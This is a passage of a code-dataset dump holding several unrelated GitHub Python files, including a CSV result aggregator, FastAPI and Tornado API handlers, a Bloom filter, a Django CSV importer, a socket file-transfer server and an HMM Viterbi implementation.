para\r\nfilename=\"result.csv\"\r\nbestfile=\"Final_DATA.csv\"\r\nsr=\"/\"\r\ncha=\"change\"\r\nsave=\"save\"\r\nevalue = 0\r\nenumber = 0\r\n#dataparamater\r\nimprovedirectory=\"improve\"\r\ndefocus_chr = \"defocus\"\r\nntfftx_chr = \"ntfftx\"\r\nntffty_chr = \"ntffty\"\r\nbion_focus_chr = 
\"bion_focus\"\r\nimproveth_plus_chr = \"improveth_plus\"\r\nimproveth_minus_chr = \"improveth_minus\"\r\nimprovefeedback_plus_chr = \"improvefeedback_plus\"\r\nimprovefeedback_minus_chr = \"improvefeedback_minus\"\r\nspacedensity_chr = \"spacedensity\"\r\nintparamater_chr = \"intparamater\"\r\nphasereverseparamater_chr = \"phasereverseparamater\"\r\nduplicateparamater_chr = \"duplicateparamater\"\r\nfield_chr = \"field\"\r\ndigt_EMT_phase_chr = \"digt_EMT_phase\"\r\ndigt_EMT_intensity_chr = \"digt_EMT_intensity\"\r\nimproveparamater_chr = \"improveparamater\"\r\n\r\ndef setdat_chr(a1,a2):\r\n with open(a1) as f:\r\n lines = f.readlines()\r\n lines_strip = [line.strip() for line in lines]\r\n xxx = [line for line in lines_strip if a2 in line]\r\n return xxx[0]\r\ndef setdat(a1,a2,a3):\r\n with open(a1) as f:\r\n lines = f.readlines()\r\n lines_strip = [line.strip() for line in lines]\r\n xxx = [line for line in lines_strip if a2 in line]\r\n yyy = xxx[0].split(' ')\r\n return yyy[a3]\r\n\r\npluslist = setdat_chr(cha,improvefeedback_plus_chr).split()\r\nminuslist = setdat_chr(cha,improvefeedback_minus_chr).split()\r\n\r\nnplist=[]\r\nnp_plus_list=[]\r\nnp_minus_list=[]\r\nevalist=[]\r\neva_plus_list=[]\r\neva_minus_list=[]\r\nnumber_cont = []\r\n\r\n######\r\n\r\n########\r\nfor i in range(1,len(pluslist)):\r\n for j in range(1,len(minuslist)):\r\n for k in range(2,para.improveparamater+1):\r\n# paradata = pd.read_csv(filename)\r\n# print(paradata)\r\n\r\n #operationfile = filename\r\n # import numpy as np\r\n cont=[]\r\n try:\r\n operationfile = para.current+sr+improvedirectory+sr+str(i)+sr+\\\r\n str(j)+sr+save+str(k)+sr+filename\r\n with open(operationfile)as f:\r\n for row in csv.reader(f):\r\n arr=row\r\n cont.append(arr)\r\n except FileNotFoundError :\r\n continue\r\n number_single=\"{0}_{1}_{2}\".format(str(i),str(j),str(k))\r\n number_cont.append(number_single)\r\n npsingle=int(float(cont[3][0]))\r\n np_plus_single=int(float(cont[3][1]))\r\n np_minus_single=int(float(cont[3][2]))\r\n evasingle=float(cont[5][0])\r\n eva_plus_single=float(cont[5][1])\r\n eva_minus_single=float(cont[5][2])\r\n nplist.append(npsingle)\r\n np_plus_list.append(np_plus_single)\r\n np_minus_list.append(np_minus_single)\r\n evalist.append(evasingle)\r\n eva_plus_list.append(eva_plus_single)\r\n eva_minus_list.append(eva_minus_single)\r\n print(i,j,k)\r\n\r\n#sort\r\nsort_nplist = sorted(nplist)\r\nsort_np_plus_list = sorted(np_plus_list)\r\nsort_np_minus_list = sorted(np_minus_list)\r\nsort_evalist = sorted(evalist)\r\nsort_eva_plus_list = sorted(eva_plus_list)\r\nsort_eva_minus_list = sorted(eva_minus_list)\r\n\r\ndef get_duplicate_list(seq):\r\n seen = []\r\n return [x for x in seq if not seen.append(x) and seen.count(x) == 1]\r\n\r\nfor i in range(1,2):\r\n for j in range(1,2):\r\n for k in range(1,2):\r\n# paradata = pd.read_csv(filename)\r\n# print(paradata)\r\n\r\n operationfile = para.current+sr+improvedirectory+sr+str(i)+sr+\\\r\n str(j)+sr+save+str(k)+sr+filename\r\n #operationfile = filename\r\n # import numpy as np\r\n cont=[]\r\n with open(operationfile)as f:\r\n for row in csv.reader(f):\r\n arr=row\r\n cont.append(arr) \r\n number_single=\"FIRST_{0}_{1}_{2}\".format(str(i),str(j),str(k))\r\n npsingle=int(float(cont[3][0]))\r\n np_plus_single=int(float(cont[3][1]))\r\n np_minus_single=int(float(cont[3][2]))\r\n evasingle=float(cont[5][0])\r\n eva_plus_single=float(cont[5][1])\r\n eva_minus_single=float(cont[5][2])\r\n # nplist.append(npsingle)\r\n # np_plus_list.append(np_plus_single)\r\n # 
np_minus_list.append(np_minus_single)\r\n # evalist.append(evasingle)\r\n # eva_plus_list.append(eva_plus_single)\r\n # eva_minus_list.append(eva_minus_single)\r\n\r\n\r\nfinalplace=para.current+sr+bestfile\r\nf = open(finalplace,'w')\r\nempty=[]\r\nf.write(\"npnumber,{}\\n\".format(npsingle))\r\nfor i in range(len(sort_nplist)):\r\n seen = []\r\n empty = empty +[[j for j, x in enumerate(nplist) if x ==sort_nplist[i] \\\r\n and not seen.append(x) and not seen.count(x) ==0]]\r\nreadylist=get_duplicate_list(empty)\r\nfor i in range(len(readylist)):\r\n if len(readylist[i]) !=1:\r\n for j in range(len(readylist[i])):\r\n f.write(\"{0},\".format(number_cont[readylist[i][j]]))\r\n if len(readylist[i]) ==1:\r\n f.write(\"{0},\".format(number_cont[readylist[i][0]]))\r\nf.write(\"\\n\")\r\nfor i in range(len(number_cont)):\r\n f.write(\"{0},\".format(str(sort_nplist[i])))\r\nf.write(\"\\n\")\r\nempty=[]\r\nf.write(\"npnumber_plus,{}\\n\".format(np_plus_single))\r\nfor i in range(len(sort_np_plus_list)):\r\n seen = []\r\n empty = empty +[[j for j, x in enumerate(np_plus_list) if x ==sort_np_plus_list[i] \\\r\n and not seen.append(x) and not seen.count(x) ==0]]\r\nreadylist=get_duplicate_list(empty)\r\nfor i in range(len(readylist)):\r\n if len(readylist[i]) !=1:\r\n for j in range(len(readylist[i])):\r\n f.write(\"{0},\".format(number_cont[readylist[i][j]]))\r\n if len(readylist[i]) ==1:\r\n f.write(\"{0},\".format(number_cont[readylist[i][0]]))\r\nf.write(\"\\n\")\r\nfor i in range(len(number_cont)):\r\n f.write(\"{0},\".format(str(sort_np_plus_list[i])))\r\nf.write(\"\\n\")\r\nempty=[]\r\nf.write(\"npnumber_minus,{}\\n\".format(np_minus_single))\r\nfor i in range(len(sort_np_minus_list)):\r\n seen = []\r\n empty = empty +[[j for j, x in enumerate(np_minus_list) if x ==sort_np_minus_list[i] \\\r\n and not seen.append(x) and not seen.count(x) ==0]]\r\nreadylist=get_duplicate_list(empty)\r\nfor i in range(len(readylist)):\r\n if len(readylist[i]) !=1:\r\n for j in range(len(readylist[i])):\r\n f.write(\"{0},\".format(number_cont[readylist[i][j]]))\r\n if len(readylist[i]) ==1:\r\n f.write(\"{0},\".format(number_cont[readylist[i][0]]))\r\nf.write(\"\\n\")\r\nfor i in range(len(number_cont)):\r\n f.write(\"{0},\".format(str(sort_np_minus_list[i])))\r\nf.write(\"\\n\")\r\nempty=[]\r\nf.write(\"evaluation,{}\\n\".format(evasingle))\r\nfor i in range(len(sort_evalist)):\r\n seen = []\r\n empty = empty +[[j for j, x in enumerate(evalist) if x ==sort_evalist[i] \\\r\n and not seen.append(x) and not seen.count(x) ==0]]\r\nreadylist=get_duplicate_list(empty)\r\nfor i in range(len(readylist)):\r\n if len(readylist[i]) !=1:\r\n for j in range(len(readylist[i])):\r\n f.write(\"{0},\".format(number_cont[readylist[i][j]]))\r\n if len(readylist[i]) ==1:\r\n f.write(\"{0},\".format(number_cont[readylist[i][0]]))\r\nf.write(\"\\n\")\r\nfor i in range(len(number_cont)):\r\n f.write(\"{0},\".format(str(sort_evalist[i])))\r\nf.write(\"\\n\")\r\nempty=[]\r\nf.write(\"evaluation_plus,{}\\n\".format(eva_plus_single))\r\nfor i in range(len(sort_eva_plus_list)):\r\n seen = []\r\n empty = empty +[[j for j, x in enumerate(eva_plus_list) if x ==sort_eva_plus_list[i] \\\r\n and not seen.append(x) and not seen.count(x) ==0]]\r\nreadylist=get_duplicate_list(empty)\r\nfor i in range(len(readylist)):\r\n if len(readylist[i]) !=1:\r\n for j in range(len(readylist[i])):\r\n f.write(\"{0},\".format(number_cont[readylist[i][j]]))\r\n if len(readylist[i]) ==1:\r\n 
f.write(\"{0},\".format(number_cont[readylist[i][0]]))\r\nf.write(\"\\n\")\r\nfor i in range(len(number_cont)):\r\n f.write(\"{0},\".format(str(sort_eva_plus_list[i])))\r\nf.write(\"\\n\")\r\nempty=[]\r\nf.write(\"evaluation_minus,{}\\n\".format(eva_minus_single))\r\nfor i in range(len(sort_eva_minus_list)):\r\n seen = []\r\n empty = empty +[[j for j, x in enumerate(eva_minus_list) if x ==sort_eva_minus_list[i] \\\r\n and not seen.append(x) and not seen.count(x) ==0]]\r\nreadylist=get_duplicate_list(empty)\r\nfor i in range(len(readylist)):\r\n if len(readylist[i]) !=1:\r\n for j in range(len(readylist[i])):\r\n f.write(\"{0},\".format(number_cont[readylist[i][j]]))\r\n if len(readylist[i]) ==1:\r\n f.write(\"{0},\".format(number_cont[readylist[i][0]]))\r\nf.write(\"\\n\")\r\nfor i in range(len(number_cont)):\r\n f.write(\"{0},\".format(str(sort_eva_minus_list[i])))\r\nf.write(\"\\n\")\r\nf.write(\"\\n\")\r\nf.write(\"FILE_NAME,\")\r\nfor i in range(1,len(pluslist)):\r\n for j in range(1,len(minuslist)):\r\n f.write(\"{0}_{1},\".format(str(i),str(j)))\r\nf.write(\"\\n\")\r\nf.write(\"fb_plus,\")\r\nfor i in range(1,len(pluslist)):\r\n for j in range(1,len(minuslist)):\r\n f.write(\"{0},\".format(str(pluslist[i])))\r\nf.write(\"\\n\")\r\nf.write(\"fb_minus,\")\r\nfor i in range(1,len(pluslist)):\r\n for j in range(1,len(minuslist)):\r\n f.write(\"{0},\".format(str(minuslist[j]))) \r\nf.write(\"\\n\")\r\nf.write(\"spacedensity,{}\".format(str(para.spacedensity)))\r\nf.write(\"\\n\")\r\nf.write(\"intparamater,{}\".format(str(para.intparamater)))\r\nf.write(\"\\n\")\r\nf.write(\"phasereverseparamater,{}\".format(str(para.phasereverseparamater)))\r\nf.write(\"\\n\")\r\nf.write(\"duplicateparamater,{}\".format(str(para.duplicateparamater)))\r\nf.write(\"\\n\")\r\nf.write(\"digt_EMT_phase,{}\".format(str(para.digt_EMT_phase)))\r\nf.write(\"\\n\")\r\nf.write(\"digt_EMT_intensity,{}\".format(str(para.digt_EMT_intensity)))\r\nf.write(\"\\n\")\r\nf.write(\"digialnumber,{}\".format(para.digtalnumber))\r\nf.write(\"\\n\")\r\nf.write(\"improveth_plus,{}\".format(str(para.improveth_plus)))\r\nf.write(\"\\n\")\r\nf.write(\"improveth_minus,{}\".format(str(para.improveth_minus)))\r\nf.write(\"\\n\")\r\nf.write(\"improveparamater,{}\".format(str(para.improveparamater)))\r\nf.close()\r\n","repo_name":"Tomoaki-5/resolution","sub_path":"best_directory.py","file_name":"best_directory.py","file_ext":"py","file_size_in_byte":10014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42599228694","text":"from fastapi import APIRouter, status, HTTPException, Depends, Response\n\nfrom sqlalchemy.future import select\nfrom sqlalchemy import insert\n\nfrom database.db import Database\nfrom routes.schemas import Floor\n\ndb = Database()\n\nrouter = APIRouter(\n prefix=\"/floor\",\n tags=[\"Floor\"],\n responses={404: {\"description\": \"Not found\"}},\n)\n\n\n@router.get('/all', tags=[\"Get all floors\"])\nasync def get_all_floors(response: Response):\n await db.connect()\n query = select(db.floors)\n result = await db.db.fetch_all(query)\n if result is None:\n raise HTTPException(status_code=404, detail=\"No floors found\")\n await db.disconnect()\n response.status_code = status.HTTP_200_OK\n return result\n\n\n@router.post('/add', tags=[\"Add floor\"])\nasync def add_floor(floor: Floor, response: Response):\n await db.connect()\n query = insert(db.floors).values(name=floor.name)\n await db.db.execute(query)\n await db.disconnect()\n response.status_code = 
status.HTTP_200_OK\n return {\"message\": \"Floor added successfully\"}\n\n\n@router.get('/all/deep', tags=[\"Get all floors with cameras\"])\nasync def get_all_floors_deep(response: Response):\n await db.connect()\n query = select(db.floors)\n dat = {}\n result = await db.db.fetch_all(query)\n if result is None:\n raise HTTPException(status_code=404, detail=\"No floors found\")\n for floor in result:\n query = select(db.cameras).where(db.cameras.c.floor_id == floor['id'])\n camera = await db.db.fetch_all(query)\n dat[floor['name']] = camera\n\n await db.disconnect()\n response.status_code = status.HTTP_200_OK\n return dat\n","repo_name":"ahmadbinshafiq/fastapi-boilercode","sub_path":"routes/floors.py","file_name":"floors.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19133449467","text":"\"\"\"\nModule contains the api controllers\n\"\"\"\nimport json\n\nfrom tornado.web import RequestHandler # pylint: disable=import-error\n\nfrom config import API_VERSION\nfrom config import LOGGER\nfrom eyegaze_prediction.api.dms.dms.get_eyegaze import predict_eyegaze\nfrom eyegaze_prediction.business_exception import BusinessException # pylint: disable=unused-import\nfrom eyegaze_prediction.business_exception import custom_except\n\n\nclass HealthCheck(RequestHandler): # pylint: disable=too-few-public-methods\n \"\"\"\n A class to handle health check endpoint requests\n \"\"\"\n\n def get(self):\n \"\"\"\n A function to handle GET requests for HealthCheck Endpoint\n Returns:\n\n \"\"\"\n result = custom_except(\"Could not process request\", \"Error\")\n try:\n result = {\"status_code\": 200, \"message\": \"Server Up\"}\n result[\"api_version\"] = API_VERSION\n self.set_status(200, \"Server Up\")\n except Exception as e: # pylint: disable=broad-except\n LOGGER.error(e.__str__())\n result[\"error\"] = e.__str__()\n self.set_status(500, \"Server Down\")\n self.write(json.dumps(result))\n\n\nclass EyegazePredictor(RequestHandler): # pylint: disable=too-few-public-methods\n \"\"\"\n Predictor class to output headgaze direction predictions and out of screen estimate\n \"\"\"\n\n def post(self):\n \"\"\"\n API which processes one image at a time for headgaze prediction.\n :return:\n \"\"\"\n response = custom_except(\"Could not fetch off-screen gaze predictions\", status_code=500)\n try:\n data = json.loads(self.request.body.decode(\"utf-8\"))\n # LOGGER.info(data)\n user_id = data.get(\"user_id\")\n file_path = data.get(\"file_path\")\n count = data.get(\"count\")\n\n if type(file_path) in [str, int, float]:\n LOGGER.exception(TypeError)\n response = custom_except(\"Invalid input format! 
Input list of file paths\", 400)\n self.set_status(400)\n elif file_path is None:\n response = custom_except(\"File path list missing\", 400)\n self.set_status(400)\n elif len(file_path) == 0:\n response = custom_except(\"File path list empty\", 404)\n self.set_status(404)\n else:\n # predict off screen gaze\n pred_batch = predict_eyegaze(file_path)\n LOGGER.info(pred_batch)\n\n response[\"data\"] = pred_batch\n response[\"status_code\"] = 200\n response[\"message\"] = \"Successfully fetched off-screen gaze predictions\"\n response[\"attributes\"] = {\n \"user_id\": user_id,\n \"file_path\": file_path,\n \"count\": count,\n }\n response[\"api_version\"] = API_VERSION\n except BusinessException as e: # pylint: disable=broad-except\n LOGGER.error(e.__str__())\n response['error'] = e.__str__()\n self.set_status(500)\n except Exception as e: # pylint: disable=broad-except\n LOGGER.error(e.__str__())\n response['error'] = e.__str__()\n self.set_status(500)\n\n self.write(json.dumps(response))\n","repo_name":"himanshu-doi/eyegaze-prediction-api","sub_path":"eyegaze_prediction/api/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"9767278476","text":"# pip install bitarray\nimport hashlib\n\n# ブルームフィルター\nclass bfindex:\n # 初期化\n def __init__(self, m=64, k=3):\n # ビット長の長さ\n self.m = m\n # 登録するインデックス数\n self.k = k\n # いくつ登録したかを保存\n self.count = 0\n # ビット列\n self.bit = 0b0\n\n # キーワードの追加\n def add(self, key):\n # k以上登録しないようにする\n if self.count < self.k:\n # ハッシュを求め、ビット列に登録\n self._set(self._hash(key))\n # 登録した数\n self.count += 1\n\n # ビット列の中に登録されているかどうか\n def check(self, key):\n # keyからハッシュ値を求める\n value = self._hash(key)\n # 保存されているビット列とkeyのハッシュが存在するかを求める\n for v, b in zip(bin(value)[2:], bin(self.bit)[2:]):\n # keyが1の場合に登録されているビット列も1なのかどうかを確認\n # 違ったら登録されていない。なので、Falseを返す\n if v == '1' and v != b:\n return False\n else:\n # 最後までループが回ったら、二つのビット形式を表示して、Trueを返す\n print(bin(self.bit)[2:], bin(value)[2:])\n return True\n\n # ビット列の加算(OR)\n def _set(self, value):\n self.bit |= value\n\n # ハッシュ値の計算\n def _hash(self, key):\n # sha256でハッシュを求め、10進数に変換し2進数に変換する。\n # その後、m個分のビット列を返す\n value = int(bin(int(hashlib.sha256(key.encode('utf-8')).hexdigest(), 16))[:self.m + 2], 2)\n return value\n\n\n# 実行テスト\nif __name__ == \"__main__\":\n b = bfindex(m=254)\n # b.add('start')\n # b.add('stop')\n # b.add('ky')\n # print(bin(b.bit))\n b.add('gagasg')\n b.add('babasa')\n b.add('basag3e4')\n print(bin(b.bit))\n\n\n # b.add('aba3a')\n # b.add('asdba')\n # b.add('hwer')\n # print(bin(b.bit))\n\n # b.add('starhshfsdht')\n # b.add('j6jrdjhdf')\n # b.add('uytkuytr')\n # print(bin(b.bit))\n\n\n print(b.check('start'))\n print(b.check('kaishi'))\n print(b.check('stop'))\n print(b.check('ky'))\n print(b.check('kasy'))\n print(b.check('baka'))","repo_name":"assen0817/bfindex","sub_path":"BloomFilte.py","file_name":"BloomFilte.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12958255882","text":"#needs to be updated and an example needs to be written\nfrom astropy.io import fits\nimport numpy as np\nfrom bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nimport requests\nimport re\nimport glob\nimport datetime\nimport time\nimport random\nimport os\nimport utils\nimport re\nimport pandas as pd\n\ninstr = 'swea'\nprojectPath = utils.getBasePath()\ninstrPath = 
projectPath + '/Data/maven/data/sci/%s/'%instr[:3]\ndef getDataLinks(dataCls='svy_3d'):\n def loadDf():\n dF = pd.read_csv(writePath1 + 'paths.csv',names=['Date','Download_Url'])\n dF = dF.set_index('Date')\n dF.index = pd.to_datetime(dF.index,format='%Y%m%d')\n return dF\n \n baseUrl = 'https://pds-ppi.igpp.ucla.edu/search/view/?f=yes&id=pds://PPI/maven.%s.calibrated/data/'%instr\n dwUrl = 'https://pds-ppi.igpp.ucla.edu/ditdos/download?id=pds://PPI/maven.%s.calibrated/data/'%instr\n dataPath = '../Data/'\n writePath1 = dataPath + '%s/'%instr + '%s/'%dataCls \n \n if not os.path.exists(writePath1 + 'paths.csv'):\n if not os.path.exists(writePath1):\n os.makedirs(writePath1)\n dataCls += '/'\n urlPref = baseUrl + dataCls \n req = Request(urlPref)\n html_page = urlopen(req)\n soup = BeautifulSoup(html_page, \"lxml\")\n yrLinks = [re.search(r'[2]\\d{3}$',item.get('href')).group(0) for item in soup.findAll('a') if re.search(r'[2]\\d{3}$',item.get('href'))]\n yrLinks = list(set(yrLinks))\n print(yrLinks)\n for yr in yrLinks:\n print(dataCls,yr)\n yrUrl = baseUrl + dataCls + yr \n req = Request(yrUrl)\n html_page = urlopen(req)\n soup = BeautifulSoup(html_page, \"lxml\")\n mtLinks = [re.search(r'[2]\\d{3}/\\d{2}$',item.get('href')).group(0).split('/')[-1] for item in soup.findAll('a') if re.search(r'[2]\\d{3}/\\d{2}$',item.get('href'))]\n mtLinks = list(set(mtLinks))\n mtLinks = ['/'+x for x in mtLinks]\n for mt in mtLinks:\n mtUrl = baseUrl + dataCls + yr + mt\n req = Request(mtUrl)\n html_page = urlopen(req)\n soup = BeautifulSoup(html_page, \"lxml\")\n fdLinks = [item.get('href').split('/')[-1] for item in soup.findAll('a') if re.search(r'&o=1\\b',item.get('href'))]\n fdLinks = list(set(fdLinks))\n dwLinks = [dwUrl+dataCls+yr+mt+'/'+x[:-4]+'.cdf' for x in fdLinks]\n for dwLink in dwLinks:\n dateS = dwLink.split('_')[-3]\n with open(writePath1 + 'paths.csv','a') as fl:\n fl.write('%s,%s\\n'%(dateS,dwLink))\n return loadDf()\n\n\n","repo_name":"PoliteCat420/mars-utils","sub_path":"swea.py","file_name":"swea.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28526932158","text":"from django.contrib import admin\nfrom django.urls import path\nfrom django.shortcuts import render\n\nfrom django import forms\n\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\n\nfrom .models import Player\n\n\nclass CsvImportForm(forms.Form):\n csv_upload = forms.FileField()\n\nclass PlayerAdmin(admin.ModelAdmin):\n list_display = ('name', 'club', 'nationality', 'age')\n\n def get_urls(self):\n urls = super().get_urls()\n new_urls = [path('upload-csv/', self.upload_csv),]\n return new_urls + urls\n\n def upload_csv(self, request):\n\n if request.method == \"POST\":\n csv_file = request.FILES[\"csv_upload\"]\n \n if not csv_file.name.endswith('.csv'):\n messages.warning(request, 'The wrong file type was uploaded')\n return HttpResponseRedirect(request.path_info)\n \n file_data = csv_file.read().decode(\"ISO-8859-1\")\n csv_data = file_data.split(\"\\n\")\n \n\n for x in csv_data[1:]:\n if x == '':\n continue\n fields = x.split(\",\")\n \n created = Player.objects.update_or_create(\n name = fields[0],\n club = fields[1],\n nationality = fields[2],\n position = fields[3],\n age = fields[4],\n matches = fields[5],\n )\n \n url = reverse('admin:index')\n return HttpResponseRedirect(url)\n\n form = CsvImportForm()\n data = {\"form\": form}\n return 
render(request, \"admin/csv_upload.html\", data)\n\nadmin.site.register(Player, PlayerAdmin)","repo_name":"AmirJlr/django-csv","sub_path":"upload/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"39745840782","text":"from turtle import position\r\nfrom ursina import *\r\nfrom ursina.prefabs.first_person_controller import FirstPersonController\r\n\r\napp = Ursina()\r\napp.setBackgroundColor(0, 0, 0)\r\nwindow.title = 'On the Eart | Planetarium'\r\nwindow.borderless = False\r\nwindow.fullscreen = True\r\nwindow.exit_button.visible = False\r\nwindow.fps_counter.enabled = False\r\nwindow.editor_ui.enabled = False\r\n\r\nfloorcubes = []\r\nfor i in range(-35, 35, 2):\r\n for j in range(-35, 35, 2):\r\n floorcubes.append(\r\n Entity(\r\n model='cube', \r\n collider='box', \r\n texture='grass',\r\n color=color.white,\r\n scale=(2, 2, 2), \r\n position=(i, 0, j)\r\n )\r\n )\r\n\r\ntext = Text(\r\n text=\"Terre | +15°C | G=9,81 m/s² | 150'000'000km du Soleil\",\r\n origin=(0, -18, -10)\r\n)\r\n\r\nAudio(sound_file_name='../sounds/music.mp3', autoplay=True, loop=True)\r\n\r\nplayer = FirstPersonController()\r\n\r\nsky=Sky()\r\n\r\nsun = Entity(\r\n model='sphere',\r\n texture=(\"images/sun.png\"),\r\n position=(-200,50,100),\r\n scale=1.8569333333333333\r\n)\r\n\r\ndef update():\r\n x = player.get_position()\r\n if x[1] < -2:\r\n player.position=(0, 1, 0)\r\n\r\nprint(\"\\033[92m____________________________________________Interstellar Main Theme by Hans Zimmer____________________________________________\\033[0m\")\r\nprint(\"\\033[92m__________________________________________Developed by Gabriel Dovat (www.galtech.ch)____________________________________\\033[0m\")\r\n \r\napp.run()","repo_name":"PlanetariumSimulator/Gravitium-V1","sub_path":"earth.py","file_name":"earth.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31107024272","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\ndef mergeKLists(lists):\n tail = head = ListNode()\n i = 0\n while i < len(lists):\n if lists[i] == None:\n lists.pop(i)\n i -= 1\n i += 1\n while len(lists) != 0:\n s_val = 999999999\n s_index = -1\n for i in range(len(lists)):\n if lists[i].val < s_val:\n s_val, s_index = lists[i].val, i\n tail.next = ListNode(s_val)\n tail = tail.next\n lists[s_index] = lists[s_index].next\n if lists[s_index] == None:\n lists.pop(s_index)\n return head.next","repo_name":"everbolt/leetcode","sub_path":"0023.py","file_name":"0023.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12623913094","text":"#Jonathan Chavarria, Chandler Martin, Jeffrey Carson\r\n#CPE 400 5/2/22\r\n#File Transfer Application Project\r\n#Server Code (RECEIVER)\r\n#Accepts files from the client\r\n#Make sure this file is running first, so it is seen as an available connection.\r\n\r\n# To run:\r\n# python3 server.py (if linux or mac)\r\n# py server.py (if windows)\r\n\r\n\r\n#Transmitted files will be added to current working directory of server.py\r\n\r\nimport socket\r\nimport myChecksumServer\r\nimport threading\r\n\r\n#Gets data from client and performs neccessary operations\r\ndef getFiles(conn, addr):\r\n print(f\"[CONNECTED] 
{addr} \", flush = True)\r\n length = int(conn.recv(1024).decode())\r\n\r\n #For amount of connections recieved\r\n for i in range(length):\r\n data = conn.recv(1024).decode()\r\n filename, clientchecksum = data.split('bruhmoment')\r\n\r\n try:\r\n #Create file with corresponding name from client\r\n with open(filename, \"wb+\") as file:\r\n\r\n bytes_read = conn.recv(1024)\r\n file.write(bytes_read)\r\n\r\n # Calculate checksum of recieved data, compares to client-side checksum\r\n serverchecksum = myChecksumServer.checksum(bytes_read.decode())\r\n if (serverchecksum != clientchecksum):\r\n print(f\"{filename} experienced corruption while being transferred, try retransmitting\\n\")\r\n\r\n print(f\"[RECEIVED] {filename} \")\r\n except IOError:\r\n print(\"Problem recieving data!\")\r\n\r\n print(f\"[DISCONNECTED] {addr} \", flush = True)\r\n conn.close()\r\n\r\nif __name__ == '__main__':\r\n s = socket.socket()\r\n host = socket.gethostname()\r\n port = 5050\r\n s.bind((host,port))\r\n s.listen(5)\r\n print(host)\r\n print(\"Waiting for any incoming connections ...\")\r\n\r\n while True:\r\n conn, addr = s.accept()\r\n thread = threading.Thread(target=getFiles, args=(conn, addr))\r\n thread.start()","repo_name":"JeffreyCarson/UniversityProjects","sub_path":"File Transfer Project/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2856644143","text":"# %%\nimport numpy as np\n\n\"\"\"隠れマルコフモデル\"\"\"\nclass HMM():\n \"\"\"コンストラクタ\"\"\"\n def __init__(self, A, B, row, data, category):\n # パラメータ\n self._A = A\n self._B = B\n self._row = row\n # データ\n self._data = data\n # ステップ数\n self._step = len(self._data)\n # サイコロの種類数\n self._cat = category\n\n # 前向き確率α(時刻t,カテゴリc)\n self._alpha = None\n # 後ろ向き確率β(時刻t, カテゴリc)\n self._beta = None\n # 時刻tにおける状態st\n self._psi = None\n self._psi_vec = None\n # 確率P(X)\n self._prob_x = None\n # 確率P(xt,st)\n self._prob_xs = None\n \n \"\"\"ビタービアルゴリズム\"\"\"\n def viterbi_algorithm(self):\n # 初期化\n x1 = int(self._data[0])\n self._psi = np.zeros((self._step, self._cat))\n self._psi[0,:] = self._row * self._B[:,x1]\n self._psi_vec = np.zeros((self._step, self._cat))\n self._psi_vec[0,:] += 1\n\n # 再帰的計算\n for t in range(1, self._step):\n xt = int(self._data[t])\n for j in range(self._cat):\n self._psi[t,j] = max(self._psi[t-1,:] * self._A[:,j]) * self._B[j,xt]\n self._psi_vec[t,j] = np.argmax(self._psi[t-1,:] * self._A[:,j]) + 1\n \n print(f\"Ψt(j):\\n{self._psi}\\n\")\n\n print(f\"Ψt(j) Vector:\\n{self._psi_vec}\\n\")\n\n # 確率P(x,s*)\n prob_xs = max(self._psi[self._step-1, :])\n\n print(f\"P(x,s*):\\n{prob_xs}\\n\")\n\n # 終了\n state = np.zeros(self._step)\n n_index = np.argmax(self._psi[self._step-1, :])\n state[self._step-1] = n_index\n\n # 系列の復元\n for t in range(self._step-2, -1, -1):\n n_index = self._psi_vec[t, int(state[t+1])]\n state[t] = n_index\n \n print(f\"状態系列s:{state}\")\n\nif __name__ == '__main__':\n A:list=np.loadtxt('../data/A.txt')\n B:list=np.loadtxt('../data/B.txt')\n row:list=np.loadtxt('../data/row.txt')\n data:list=np.loadtxt('../data/data.txt')\n category:int=3\n\n hmm = HMM(A, B, row, data, category)\n hmm.viterbi_algorithm()\n# %%\n","repo_name":"Haruka-Miyoshi/HMM","sub_path":"src/viterbi/HMM.py","file_name":"HMM.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25185250201","text":"# Contains 
objects that allow the program to compute YCN and recall percentage\nimport decimal\nimport urllib.request\n\nfrom bs4 import BeautifulSoup\nfrom mechanize import Browser\n\n# From https://www.cs.cmu.edu/~112/notes/cmu_112_graphics.py\n\n\nfrom cmu_112_graphics import *\n\n\n############################## Helper Functions ###############################\n\n# From: https://www.cs.cmu.edu/~112/notes/notes-variables-and-functions.html\ndef roundHalfUp(d):\n # Round to nearest with ties going away from zero\n rounding = decimal.ROUND_HALF_UP\n # See other rounding options here:\n # https://docs.python.org/3/library/decimal.html#rounding-modes\n return int(decimal.Decimal(d).to_integral_value(rounding=rounding))\n\n\nclass Competition(object):\n competitions = dict()\n\n def __init__(self, html, name, dancer):\n self.recallPercentages = dict()\n self.recallPercentagesCalculated = False\n self.dancer = dancer\n self.events = dict()\n self.name = name\n self.html = BeautifulSoup(html, features='html.parser')\n self.getEvents(dancer)\n self.number = None\n self.numberOfPossibleRecalls = dict()\n self.numberOfRecalls = dict()\n Competition.competitions[self.name] = self\n\n def __repr__(self):\n return self.name\n\n def getEvents(self, dancer):\n for link in 